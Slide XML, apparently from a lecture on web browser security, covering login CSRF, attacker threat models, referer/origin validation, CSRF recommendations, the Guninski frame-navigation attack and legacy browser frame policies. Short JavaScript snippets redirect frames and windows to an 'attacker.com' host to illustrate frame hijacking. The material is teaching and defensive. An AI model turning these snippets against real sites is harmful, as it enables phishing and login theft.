            <a:ext cx="70199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797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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9830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209675"/>
            <a:ext cx="70008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031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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="993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038" y="1209675"/>
            <a:ext cx="70199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349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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10035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95400"/>
            <a:ext cx="4760913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998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 Threat Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14510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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can obtain SSL/TLS certificate for attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or: runs attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passive: Wireless eavesdropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active: Evil router, DNS poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker escapes browser isolation mechanisms and run separately under control of OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451012" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="0" cy="48006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lg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Login CSRF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838200" y="1600200"/>
          <a:ext cx="7924800" cy="511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8" name="Acrobat Document" r:id="rId4" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId4" imgW="6998400" imgH="45216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00200"/>
                        <a:ext cx="7924800" cy="511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4648200" y="3962400"/>
            <a:ext cx="2667000" cy="457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4838700" y="2781300"/>
            <a:ext cx="2057400" cy="304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53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Sites can redirect browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110595" name="Picture 2" descr="Redirecting Incoming Http Requests"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="14000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1828800"/>
            <a:ext cx="67246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6" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3638550" y="1676400"/>
            <a:ext cx="2514600" cy="457200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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110597" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3429000"/>
            <a:ext cx="609600" cy="304800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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110598" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="742950" y="3886200"/>
            <a:ext cx="1981200" cy="304800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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill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690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Attack on origin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112643" name="Picture 2" descr="Redirecting Incoming Http Requests"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="14000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1828800"/>
            <a:ext cx="67246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4" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3638550" y="1676400"/>
            <a:ext cx="2514600" cy="457200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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112645" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3429000"/>
            <a:ext cx="609600" cy="304800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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112646" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="742950" y="3886200"/>
            <a:ext cx="1981200" cy="304800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 type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112647" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="1828800"/>
            <a:ext cx="2789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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>referer: http://www.site.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112648" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3471863"/>
            <a:ext cx="27892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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>referer: http://www.site.com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8200" y="5334000"/>
            <a:ext cx="8077200" cy="83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6F89F7"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>What if honest site sends POST to attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65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6F89F7"/>
              </a:buClr>
              <a:buSzPct val="110000"/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Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>origin header records redirect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191123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CSRF Recommendations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524000"/>
            <a:ext cx="7391400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Login CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/Origin header validation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Login forms typically submit over HTTPS, not blocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTPS sites, such as banking sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/Origin validation to prevent CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use Ruby-on-Rails or other framework that implements secret token method correctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Origin header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Alternative to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> with fewer privacy problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Send only on POST, send only necessary data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Defense against redirect-based attacks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1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Navigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096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0962" name="Rectangle 109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721E4E98-6C54-4011-A044-49C2C5501BA0}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>84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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Guninski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 3" descr="adsen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68580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588000" y="4114800"/>
            <a:ext cx="2133600" cy="1536700"/>
            <a:chOff x="4656" y="1440"/>
            <a:chExt cx="864" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41994" name="Picture 7" descr="transparen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56" y="1440"/>
              <a:ext cx="864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5" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4663" y="1440"/>
              <a:ext cx="844" cy="768"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150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800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1356809" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6057900" y="3748088"/>
            <a:ext cx="1187450" cy="366712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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awglogin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 12" descr="MCj034912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96000" y="4114800"/>
            <a:ext cx="1646238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990600" y="5029200"/>
            <a:ext cx="5638800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 94699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400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open("https://attacker.com/", "awglogin");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 12" descr="MCj034912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6200" y="5181600"/>
            <a:ext cx="1646238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6809" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="1" animBg="1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should the policy be?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6005A46-79CA-40A0-B97E-2AB30C506EA8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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6686550" cy="50577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med"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="2103438"/>
            <a:ext cx="6537325" cy="4205287"/>
          </a:xfrm>
          <a:prstGeom prst="rect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3014" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="2895600"/>
            <a:ext cx="1819275" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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3015" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1362075" y="2895600"/>
            <a:ext cx="2133600" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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514475" y="4648200"/>
            <a:ext cx="1828800" cy="1295400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wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/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rot="5400000">
            <a:off x="1866900" y="4457700"/>
            <a:ext cx="1447800" cy="15240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3200400" y="3657600"/>
            <a:ext cx="3429000" cy="60960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rot="5400000">
            <a:off x="2705100" y="3238500"/>
            <a:ext cx="2514600" cy="18288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21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2362200" y="3124200"/>
            <a:ext cx="2667000" cy="1905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905000" y="4038600"/>
            <a:ext cx="741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Child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632325" y="3562350"/>
            <a:ext cx="930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Sibling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749675" y="4324350"/>
            <a:ext cx="1508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Descendant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810000" y="3810000"/>
            <a:ext cx="1465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BA9921"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame Bust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315" name="Group 187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66344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Browser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Policy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 6 (default)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Permissive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 6 (option)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Child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IE7 (no Flash)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Descendant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IE7 (with Flash)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Permissive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Firefox 2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Window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Safari 3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Permissive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Opera 9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Window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</a:endParaRP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HTML 5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Child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4066" name="Picture 62" descr="safa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75" y="47117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7" name="Picture 63" descr="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588" y="206692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8" name="Picture 64" descr="firefo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488" y="4210050"/>
            <a:ext cx="53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9" name="Picture 65" descr="ope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" y="5268913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0" name="Picture 70" descr="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" y="5715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1" name="Picture 71" descr="ie-6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150" y="368935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7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="500063" y="2557463"/>
            <a:ext cx="685800" cy="685800"/>
            <a:chOff x="192" y="1310"/>
            <a:chExt cx="480" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44076" name="Picture 73" descr="i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1310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7" name="Picture 72" descr="do-not-enter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93" y="1605"/>
              <a:ext cx="96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073" name="Picture 130" descr="ie-6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7375" y="3178175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4" name="Picture 20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="869950" y="3852863"/>
            <a:ext cx="349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75" name="Title 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096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4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legacy Browser Behavior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pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Window Policy Anomaly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083" name="Picture 4" descr="igoogle-bef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828800"/>
            <a:ext cx="5719763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2971800" y="2493963"/>
            <a:ext cx="5638800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 94699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sz="1800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044825" y="2600325"/>
            <a:ext cx="56515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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[1].location = "http://www.attacker.com/...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[2].location = "http://www.attacker.com/...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="igoogle-af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828800"/>
            <a:ext cx="5724525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animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47110" grpId="1" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId="1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315" name="Group 187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66344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Browser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Policy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 6 (default)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Permissive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 6 (option)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Child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IE7 (no Flash)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Descendant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IE7 (with Flash)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Permissive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Firefox 2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Window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Safari 3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Permissive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Opera 9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Window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</a:endParaRP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HTML 5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Child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4066" name="Picture 62" descr="safa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75" y="47117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7" name="Picture 63" descr="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588" y="206692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8" name="Picture 64" descr="firefo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488" y="4210050"/>
            <a:ext cx="53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9" name="Picture 65" descr="ope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" y="5268913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0" name="Picture 70" descr="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" y="5715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1" name="Picture 71" descr="ie-6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150" y="368935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7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="500063" y="2557463"/>
            <a:ext cx="685800" cy="685800"/>
            <a:chOff x="192" y="1310"/>
            <a:chExt cx="480" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44076" name="Picture 73" descr="i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1310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7" name="Picture 72" descr="do-not-enter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93" y="1605"/>
              <a:ext cx="96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073" name="Picture 130" descr="ie-6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7375" y="3178175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4" name="Picture 20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="869950" y="3852863"/>
            <a:ext cx="349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75" name="Title 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096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4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legacy Browser Behavior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 attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432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Browsers (like any software) contain exploitable bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often enable remote code execution by web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google study:     [the ghost in the browser 2007]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found Trojans on 300,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found adware on 18,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even if browsers were bug-free, still lots of vulnerabilities on the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
